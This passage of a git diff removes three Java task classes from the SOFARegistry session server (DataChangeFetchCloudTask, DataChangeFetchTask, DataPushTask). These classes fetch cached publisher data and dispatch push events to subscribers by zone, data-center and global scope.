OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.store.BaseInfo.ClientVersion; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ReceivedData; -import com.alipay.sofa.registry.core.model.ScopeEnum; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.cache.DatumKey; -import com.alipay.sofa.registry.server.session.cache.Key; -import com.alipay.sofa.registry.server.session.cache.Key.KeyType; -import com.alipay.sofa.registry.server.session.cache.Value; -import com.alipay.sofa.registry.server.session.converter.ReceivedDataConverter; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.node.NodeManagerFactory; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.store.ReSubscribers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -import java.net.InetSocketAddress; -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.Map.Entry; -import java.util.stream.Collectors; - -/** - * - * @author shangyu.wh - * @version $Id: DataChangeFetchCloudTask.java, v 0.1 2018-03-16 15:28 shangyu.wh Exp $ - */ -public class DataChangeFetchCloudTask extends AbstractSessionTask { - - private final static Logger LOGGER = LoggerFactory - .getLogger(DataChangeFetchCloudTask.class); - - private static final Logger taskLogger = LoggerFactory.getLogger( - DataChangeFetchCloudTask.class, "[Task]"); - - private final SessionServerConfig sessionServerConfig; - - private Interests sessionInterests; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - private final TaskListenerManager taskListenerManager; - - private final ExecutorManager executorManager; - - private String fetchDataInfoId; - - private final CacheService sessionCacheService; - - public DataChangeFetchCloudTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - Interests sessionInterests, ExecutorManager executorManager, - CacheService sessionCacheService) { - this.sessionServerConfig = sessionServerConfig; - this.taskListenerManager = taskListenerManager; - this.sessionInterests = sessionInterests; - this.executorManager = executorManager; - this.sessionCacheService = sessionCacheService; - } - - @Override - public long getExpiryTime() { - return -1; - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - - Object obj = taskEvent.getEventObj(); - - if (!(obj instanceof String)) { - throw new IllegalArgumentException("Input task event object error!"); - } - - this.fetchDataInfoId = (String) obj; - } - - @Override - public void execute() { - - Map datumMap = getDatumsCache(); - - if (datumMap != null && !datumMap.isEmpty()) { - - PushTaskClosure pushTaskClosure = getTaskClosure(datumMap); - - for (ScopeEnum scopeEnum : ScopeEnum.values()) { - Map> map = getCache(fetchDataInfoId, - scopeEnum); - if (map != null && !map.isEmpty()) { - for (Entry> entry : map.entrySet()) { - Map subscriberMap = entry.getValue(); - if (subscriberMap != null && !subscriberMap.isEmpty()) { - List subscriberRegisterIdList = new ArrayList<>( - subscriberMap.keySet()); - - //select one row decide common info - Subscriber subscriber = subscriberMap.values().iterator().next(); - - //remove stopPush subscriber avoid push duplicate - evictReSubscribers(subscriberMap.values()); - - fireReceivedDataMultiPushTask(datumMap, subscriberRegisterIdList, - scopeEnum, subscriber, subscriberMap, pushTaskClosure); - } - } - } - } - - pushTaskClosure.start(); - } else { - LOGGER.error("Get publisher data error,which dataInfoId:{}", fetchDataInfoId); - } - } - - public PushTaskClosure getTaskClosure(Map datumMap) { - PushTaskClosure pushTaskClosure = new PushTaskClosure(executorManager.getPushTaskClosureExecutor()); - pushTaskClosure.setTaskClosure((status, task) -> { - if (status == ProcessingResult.Success) { - if (sessionServerConfig.isStopPushSwitch()) { - LOGGER.info("Stop Push switch on,dataInfoId {} version can not be update!", fetchDataInfoId); - return; - } - datumMap.forEach((dataCenter, datum) -> { - String dataInfoId = fetchDataInfoId; - Long version = datum.getVersion(); - boolean result = sessionInterests.checkAndUpdateInterestVersions(dataCenter, dataInfoId, version); - if (result) { - LOGGER.info("Push all tasks success,dataCenter:{} dataInfoId:{} version:{} update!", dataCenter, - dataInfoId, version); - } else { - LOGGER.info( - "Push all tasks success,but dataCenter:{} dataInfoId:{} version:{} need not update!", - dataCenter, - dataInfoId, version); - } - }); - } else { - LOGGER.warn("Push tasks found error,subscribers version can not be update!dataInfoId={}", - fetchDataInfoId); - } - }); - return pushTaskClosure; - } - - private void evictReSubscribers(Collection subscribersPush) { - if (this.sessionInterests instanceof ReSubscribers) { - ReSubscribers reSubscribers = (ReSubscribers) sessionInterests; - subscribersPush.forEach(reSubscribers::deleteReSubscriber); - } - } - - private Map> getCache(String dataInfoId, - ScopeEnum scopeEnum) { - - return sessionInterests.querySubscriberIndex(dataInfoId, scopeEnum); - } - - private Map getDatumsCache() { - - Map map = new HashMap<>(); - NodeManager nodeManager = NodeManagerFactory.getNodeManager(NodeType.META); - Collection dataCenters = nodeManager.getDataCenters(); - if (dataCenters != null) { - Collection keys = dataCenters.stream(). - map(dataCenter -> new Key(KeyType.OBJ, DatumKey.class.getName(), - new DatumKey(fetchDataInfoId, dataCenter))). - collect(Collectors.toList()); - - Map values = sessionCacheService.getValues(keys); - - if (values != null) { - values.forEach((key, value) -> { - if (value != null && value.getPayload() != null) { - map.put(((DatumKey) key.getEntityType()).getDataCenter(), (Datum) value.getPayload()); - } - }); - } - - } - return map; - } - - private void fireReceivedDataMultiPushTask(Map datums, - List subscriberRegisterIdList, - ScopeEnum scopeEnum, Subscriber subscriber, - Map subscriberMap, - PushTaskClosure pushTaskClosure) { - boolean isOldVersion = !ClientVersion.StoreData.equals(subscriber.getClientVersion()); - if (!isOldVersion) { - fireReceiveDataPushTask(datums, subscriberRegisterIdList, scopeEnum, subscriber, - subscriberMap, pushTaskClosure); - } else { - if (subscriber.getScope() == ScopeEnum.zone) { - fireUserDataElementPushTask(ReceivedDataConverter.getMergeDatum(datums), - subscriber, subscriberMap, pushTaskClosure); - } else { - fireUserDataElementMultiPushTask(ReceivedDataConverter.getMergeDatum(datums), - subscriber, subscriberMap, pushTaskClosure); - } - } - } - - private void fireReceiveDataPushTask(Map datums, - List subscriberRegisterIdList, - ScopeEnum scopeEnum, Subscriber subscriber, - Map subscriberMap, - PushTaskClosure pushTaskClosure) { - Collection subscribers = new ArrayList<>(subscriberMap.values()); - ReceivedData receivedData = ReceivedDataConverter.getReceivedDataMulti(datums, scopeEnum, - subscriberRegisterIdList, subscriber); - - //trigger push to client node - Map parameter = new HashMap<>(); - parameter.put(receivedData, subscriber.getSourceAddress()); - TaskEvent taskEvent = new TaskEvent(parameter, TaskType.RECEIVED_DATA_MULTI_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskLogger.info("send {} taskURL:{},taskScope:{}", taskEvent.getTaskType(), - subscriber.getSourceAddress(), scopeEnum); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void fireUserDataElementPushTask(Datum datum, Subscriber subscriber, - Map subscriberMap, - PushTaskClosure pushTaskClosure) { - - Collection subscribers = new ArrayList<>(subscriberMap.values()); - - TaskEvent taskEvent = new TaskEvent(TaskType.USER_DATA_ELEMENT_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, subscriber.getSourceAddress()); - - int size = datum != null && datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={},subSize={}", - taskEvent.getTaskType(), subscriber.getSourceAddress(), datum.getDataInfoId(), - datum.getDataCenter(), size, subscribers.size()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void fireUserDataElementMultiPushTask(Datum datum, Subscriber subscriber, - Map subscriberMap, - PushTaskClosure pushTaskClosure) { - Collection subscribers = new ArrayList<>(subscriberMap.values()); - - TaskEvent taskEvent = new TaskEvent(TaskType.USER_DATA_ELEMENT_MULTI_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, subscriber.getSourceAddress()); - - int size = datum != null && datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={},subSize={}", - taskEvent.getTaskType(), subscriber.getSourceAddress(), datum.getDataInfoId(), - datum.getDataCenter(), size, subscribers.size()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getDataChangeFetchTaskRetryTimes()); - } - - @Override - public String toString() { - return "DATA_CHANGE_FETCH_CLOUD_TASK{" + "taskId='" + getTaskId() + '\'' - + ", fetchDataInfoId=" + fetchDataInfoId + ", expiryTime='" + getExpiryTime() + '\'' - + '}'; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataChangeFetchTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataChangeFetchTask.java deleted file mode 100644 index 3757a3117..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataChangeFetchTask.java +++ /dev/null @@ -1,341 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.sessionserver.DataChangeRequest; -import com.alipay.sofa.registry.common.model.store.BaseInfo.ClientVersion; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ReceivedData; -import com.alipay.sofa.registry.core.model.ScopeEnum; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.cache.DatumKey; -import com.alipay.sofa.registry.server.session.cache.Key; -import com.alipay.sofa.registry.server.session.cache.Key.KeyType; -import com.alipay.sofa.registry.server.session.cache.Value; -import com.alipay.sofa.registry.server.session.converter.ReceivedDataConverter; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.store.ReSubscribers; -import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -import java.net.InetSocketAddress; -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.Map.Entry; -import java.util.function.Predicate; - -/** - * - * @author shangyu.wh - * @version $Id: DataChangeFetchTask.java, v 0.1 2017-12-13 12:25 shangyu.wh Exp $ - */ -public class DataChangeFetchTask extends AbstractSessionTask { - - private final static Logger LOGGER = LoggerFactory - .getLogger(DataChangeFetchTask.class); - - private static final Logger taskLogger = LoggerFactory.getLogger( - DataChangeFetchTask.class, "[Task]"); - - private final SessionServerConfig sessionServerConfig; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - private final TaskListenerManager taskListenerManager; - - private final ExecutorManager executorManager; - - private DataChangeRequest dataChangeRequest; - - private final Interests sessionInterests; - - private final CacheService sessionCacheService; - - public DataChangeFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - ExecutorManager executorManager, Interests sessionInterests, - CacheService sessionCacheService) { - this.sessionServerConfig = sessionServerConfig; - this.taskListenerManager = taskListenerManager; - this.executorManager = executorManager; - this.sessionInterests = sessionInterests; - this.sessionCacheService = sessionCacheService; - } - - @Override - public void execute() { - - String localDataCenterID = sessionServerConfig.getSessionServerDataCenter(); - - boolean ifLocalDataCenter = localDataCenterID.equals(dataChangeRequest.getDataCenter()); - - Datum datum = getDatumCache(); - - if (datum != null) { - PushTaskClosure pushTaskClosure = getTaskClosure(); - - for (ScopeEnum scopeEnum : ScopeEnum.values()) { - Map> map = getCache(scopeEnum); - if (map != null && !map.isEmpty()) { - for (Entry> entry : map.entrySet()) { - Map subscriberMap = entry.getValue(); - if (subscriberMap != null && !subscriberMap.isEmpty()) { - - //check subscriber push version - Collection subscribersSend = subscribersVersionCheck(subscriberMap - .values()); - if (subscribersSend.isEmpty()) { - continue; - } - - //remove stopPush subscriber avoid push duplicate - evictReSubscribers(subscribersSend); - - List subscriberRegisterIdList = new ArrayList<>( - subscriberMap.keySet()); - - Subscriber subscriber = subscriberMap.values().iterator().next(); - boolean isOldVersion = !ClientVersion.StoreData.equals(subscriber - .getClientVersion()); - - switch (scopeEnum) { - case zone: - if (ifLocalDataCenter) { - if (isOldVersion) { - fireUserDataElementPushTask(entry.getKey(), datum, - subscribersSend, pushTaskClosure); - } else { - fireReceivedDataMultiPushTask(datum, - subscriberRegisterIdList, subscribersSend, - ScopeEnum.zone, subscriber, pushTaskClosure); - } - } - break; - case dataCenter: - if (ifLocalDataCenter) { - if (isOldVersion) { - fireUserDataElementMultiPushTask(entry.getKey(), datum, - subscribersSend, pushTaskClosure); - } else { - fireReceivedDataMultiPushTask(datum, - subscriberRegisterIdList, subscribersSend, - scopeEnum, subscriber, pushTaskClosure); - } - } - break; - case global: - fireReceivedDataMultiPushTask(datum, subscriberRegisterIdList, - subscribersSend, scopeEnum, subscriber, pushTaskClosure); - break; - default: - LOGGER.warn("unknown scope, {}", subscriber); - } - } - } - } - } - - pushTaskClosure.start(); - - } else { - LOGGER.error("Get publisher data error,which dataInfoId:" - + dataChangeRequest.getDataInfoId() + " on dataCenter:" - + dataChangeRequest.getDataCenter()); - } - } - - private Collection subscribersVersionCheck(Collection subscribers) { - Collection subscribersSend = new ArrayList<>(); - for (Subscriber subscriber : subscribers) { - if (subscriber.checkVersion(dataChangeRequest.getDataCenter(), - dataChangeRequest.getVersion())) { - subscribersSend.add(subscriber); - } - } - return subscribersSend; - } - - public PushTaskClosure getTaskClosure() { - //this for all this dataInfoId push result get and call back to change version - PushTaskClosure pushTaskClosure = new PushTaskClosure(executorManager.getPushTaskClosureExecutor()); - pushTaskClosure.setTaskClosure((status, task) -> { - String dataCenter = dataChangeRequest.getDataCenter(); - String dataInfoId = dataChangeRequest.getDataInfoId(); - Long version = dataChangeRequest.getVersion(); - if (status == ProcessingResult.Success) { - - if (sessionServerConfig.isStopPushSwitch()) { - LOGGER.info("Stop Push switch on,dataCenter {} dataInfoId {} version {} can not be update!", - dataCenter, dataInfoId, version); - return; - } - boolean result = sessionInterests.checkAndUpdateInterestVersions(dataCenter, dataInfoId, version); - if (result) { - LOGGER.info("Push all tasks success,dataCenter:{} dataInfoId:{} version:{} update!", dataCenter, - dataInfoId, version); - } else { - LOGGER.info("Push all tasks success,but dataCenter:{} dataInfoId:{} version:{} need not update!", - dataCenter, - dataInfoId, version); - } - } else { - LOGGER.warn( - "Push tasks found error,subscribers version can not be update!dataCenter:{} dataInfoId:{} version:{}", - dataCenter, dataInfoId, version); - } - }); - return pushTaskClosure; - } - - private void evictReSubscribers(Collection subscribersPush) { - if (this.sessionInterests instanceof ReSubscribers) { - ReSubscribers reSubscribers = (ReSubscribers) sessionInterests; - subscribersPush.forEach(reSubscribers::deleteReSubscriber); - } - } - - private void fireReceivedDataMultiPushTask(Datum datum, List subscriberRegisterIdList, - Collection subscribers, - ScopeEnum scopeEnum, Subscriber subscriber, - PushTaskClosure pushTaskClosure) { - String dataId = datum.getDataId(); - Predicate zonePredicate = (zone) -> { - if (!sessionServerConfig.getSessionServerRegion().equals(zone)) { - if (ScopeEnum.zone == scopeEnum) { - // zone scope subscribe only return zone list - return true; - - } else if (ScopeEnum.dataCenter == scopeEnum) { - // disable zone config - return sessionServerConfig.isInvalidForeverZone(zone) - && !sessionServerConfig.isInvalidIgnored(dataId); - } - } - return false; - }; - ReceivedData receivedData = ReceivedDataConverter.getReceivedDataMulti(datum, scopeEnum, - subscriberRegisterIdList, sessionServerConfig.getSessionServerRegion(), zonePredicate); - - //trigger push to client node - Map parameter = new HashMap<>(); - parameter.put(receivedData, subscriber.getSourceAddress()); - TaskEvent taskEvent = new TaskEvent(parameter, TaskType.RECEIVED_DATA_MULTI_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskLogger.info("send {} taskURL:{},taskScope:{}", taskEvent.getTaskType(), subscriber.getSourceAddress(), - scopeEnum); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private Map> getCache(ScopeEnum scopeEnum) { - return sessionInterests.querySubscriberIndex(dataChangeRequest.getDataInfoId(), scopeEnum); - } - - private Datum getDatumCache() { - DatumKey datumKey = new DatumKey(dataChangeRequest.getDataInfoId(), - dataChangeRequest.getDataCenter()); - Key key = new Key(KeyType.OBJ, datumKey.getClass().getName(), datumKey); - Value value = sessionCacheService.getValue(key); - return value == null ? null : value.getPayload(); - } - - private void fireUserDataElementPushTask(InetSocketAddress address, Datum datum, - Collection subscribers, - PushTaskClosure pushTaskClosure) { - - TaskEvent taskEvent = new TaskEvent(TaskType.USER_DATA_ELEMENT_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - taskEvent.setSendTimeStamp(datum.getVersion()); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, new URL(address)); - - int size = datum != null && datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={},subSize={}", - taskEvent.getTaskType(), address, datum.getDataInfoId(), datum.getDataCenter(), size, - subscribers.size()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void fireUserDataElementMultiPushTask(InetSocketAddress address, Datum datum, - Collection subscribers, - PushTaskClosure pushTaskClosure) { - - TaskEvent taskEvent = new TaskEvent(TaskType.USER_DATA_ELEMENT_MULTI_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - taskEvent.setSendTimeStamp(datum.getVersion()); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, new URL(address)); - - int size = datum != null && datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={},subSize={}", - taskEvent.getTaskType(), address, datum.getDataInfoId(), datum.getDataCenter(), size, - subscribers.size()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - @Override - public long getExpiryTime() { - return -1; - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); - - if (!(obj instanceof DataChangeRequest)) { - throw new IllegalArgumentException("Input task event object error!"); - } - - this.dataChangeRequest = (DataChangeRequest) obj; - } - - /** - * Setter method for property dataChangeRequest. - * - * @param dataChangeRequest value to be assigned to property dataChangeRequest - */ - public void setDataChangeRequest(DataChangeRequest dataChangeRequest) { - this.dataChangeRequest = dataChangeRequest; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getDataChangeFetchTaskRetryTimes()); - } - - @Override - public String toString() { - return "DATA_CHANGE_FETCH_TASK{" + "taskId='" + getTaskId() + '\'' + ", dataChangeRequest=" - + dataChangeRequest + ", expiryTime='" + getExpiryTime() + '\'' + '}'; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataPushTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataPushTask.java deleted file mode 100644 index e372dc21c..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/DataPushTask.java +++ /dev/null @@ -1,280 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.sessionserver.DataPushRequest; -import com.alipay.sofa.registry.common.model.store.BaseInfo.ClientVersion; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ReceivedData; -import com.alipay.sofa.registry.core.model.ScopeEnum; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.converter.ReceivedDataConverter; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -import java.net.InetSocketAddress; -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.Map.Entry; -import java.util.function.Predicate; - -/** - * - * @author shangyu.wh - * @version $Id: DataPushTask.java, v 0.1 2018-08-29 19:46 shangyu.wh Exp $ - */ -public class DataPushTask extends AbstractSessionTask { - - private final static Logger LOGGER = LoggerFactory.getLogger(DataPushTask.class); - - private static final Logger taskLogger = LoggerFactory.getLogger(DataPushTask.class, - "[Task]"); - - private final SessionServerConfig sessionServerConfig; - - private final Interests sessionInterests; - - private final ExecutorManager executorManager; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - private final TaskListenerManager taskListenerManager; - - private DataPushRequest dataPushRequest; - - public DataPushTask(Interests sessionInterests, SessionServerConfig sessionServerConfig, - ExecutorManager executorManager, TaskListenerManager taskListenerManager) { - this.sessionInterests = sessionInterests; - this.sessionServerConfig = sessionServerConfig; - this.executorManager = executorManager; - this.taskListenerManager = taskListenerManager; - } - - @Override - public void execute() { - - String localDataCenterID = sessionServerConfig.getSessionServerDataCenter(); - - Datum datum = dataPushRequest.getDatum(); - - if (datum != null) { - - boolean ifLocalDataCenter = localDataCenterID.equals(datum.getDataCenter()); - - String dataInfoId = datum.getDataInfoId(); - - PushTaskClosure pushTaskClosure = getTaskClosure(); - - for (ScopeEnum scopeEnum : ScopeEnum.values()) { - Map> map = getCache(scopeEnum, - dataInfoId); - if (map != null && !map.isEmpty()) { - for (Entry> entry : map.entrySet()) { - Map subscriberMap = entry.getValue(); - if (subscriberMap != null && !subscriberMap.isEmpty()) { - List subscriberRegisterIdList = new ArrayList<>( - subscriberMap.keySet()); - - Subscriber subscriber = subscriberMap.values().iterator().next(); - boolean isOldVersion = !ClientVersion.StoreData.equals(subscriber - .getClientVersion()); - - Collection subscribersSend = new ArrayList<>( - subscriberMap.values()); - - switch (scopeEnum) { - case zone: - if (ifLocalDataCenter) { - if (isOldVersion) { - fireUserDataElementPushTask(entry.getKey(), datum, - subscribersSend, pushTaskClosure); - } else { - fireReceivedDataMultiPushTask(datum, - subscriberRegisterIdList, ScopeEnum.zone, - subscriber, pushTaskClosure, subscriberMap); - } - } - break; - case dataCenter: - if (ifLocalDataCenter) { - if (isOldVersion) { - fireUserDataElementMultiPushTask(entry.getKey(), datum, - subscribersSend, pushTaskClosure); - } else { - fireReceivedDataMultiPushTask(datum, - subscriberRegisterIdList, scopeEnum, subscriber, - pushTaskClosure, subscriberMap); - } - } - break; - case global: - fireReceivedDataMultiPushTask(datum, subscriberRegisterIdList, - scopeEnum, subscriber, pushTaskClosure, subscriberMap); - break; - default: - LOGGER.warn("unknown scope, {}", subscriber); - } - } - } - } - } - pushTaskClosure.start(); - } - } - - public PushTaskClosure getTaskClosure() { - PushTaskClosure pushTaskClosure = new PushTaskClosure(executorManager.getPushTaskClosureExecutor()); - pushTaskClosure.setTaskClosure((status, task) -> { - if (status == ProcessingResult.Success) { - Datum datum = dataPushRequest.getDatum(); - String dataCenter = datum.getDataCenter(); - String dataInfoId = datum.getDataInfoId(); - Long version = datum.getVersion(); - - if (sessionServerConfig.isStopPushSwitch()) { - LOGGER.info("Stop Push switch on,dataCenter {} dataInfoId {} version {} can not be update!", - dataCenter, dataInfoId, version); - return; - } - - LOGGER.info("Push all temp data tasks success,dataCenter:{} dataInfoId:{} version:{} update!", - dataCenter, dataInfoId, - version); - } else { - LOGGER.warn("Push temp data tasks found error,subscribers version can not be update!"); - } - }); - return pushTaskClosure; - } - - private void fireReceivedDataMultiPushTask(Datum datum, List subscriberRegisterIdList, - ScopeEnum scopeEnum, Subscriber subscriber, - PushTaskClosure pushTaskClosure, Map subscriberMap) { - Collection subscribers = new ArrayList<>(subscriberMap.values()); - String dataId = datum.getDataId(); - Predicate zonePredicate = (zone) -> { - if (!sessionServerConfig.getSessionServerRegion().equals(zone)) { - if (ScopeEnum.zone == scopeEnum) { - // zone scope subscribe only return zone list - return true; - - } else if (ScopeEnum.dataCenter == scopeEnum) { - // disable zone config - if (sessionServerConfig.isInvalidForeverZone(zone) - && !sessionServerConfig.isInvalidIgnored(dataId)) { - return true; - } - } - } - return false; - }; - ReceivedData receivedData = ReceivedDataConverter.getReceivedDataMulti(datum, scopeEnum, - subscriberRegisterIdList, sessionServerConfig.getSessionServerRegion(), zonePredicate); - - //trigger push to client node - Map parameter = new HashMap<>(); - parameter.put(receivedData, subscriber.getSourceAddress()); - TaskEvent taskEvent = new TaskEvent(parameter, TaskType.RECEIVED_DATA_MULTI_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskLogger.info("send {} taskURL:{},taskScope:{}", taskEvent.getTaskType(), subscriber.getSourceAddress(), - scopeEnum); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private Map> getCache(ScopeEnum scopeEnum, - String dataInfoId) { - return sessionInterests.querySubscriberIndex(dataInfoId, scopeEnum); - } - - private void fireUserDataElementPushTask(InetSocketAddress address, Datum datum, - Collection subscribers, - PushTaskClosure pushTaskClosure) { - - TaskEvent taskEvent = new TaskEvent(TaskType.USER_DATA_ELEMENT_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, new URL(address)); - - int size = datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={},subSize={}", - taskEvent.getTaskType(), address, datum.getDataInfoId(), datum.getDataCenter(), size, - subscribers.size()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void fireUserDataElementMultiPushTask(InetSocketAddress address, Datum datum, - Collection subscribers, - PushTaskClosure pushTaskClosure) { - - TaskEvent taskEvent = new TaskEvent(TaskType.USER_DATA_ELEMENT_MULTI_PUSH_TASK); - taskEvent.setTaskClosure(pushTaskClosure); - - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, new URL(address)); - - int size = datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={},subSize={}", - taskEvent.getTaskType(), address, datum.getDataInfoId(), datum.getDataCenter(), size, - subscribers.size()); - 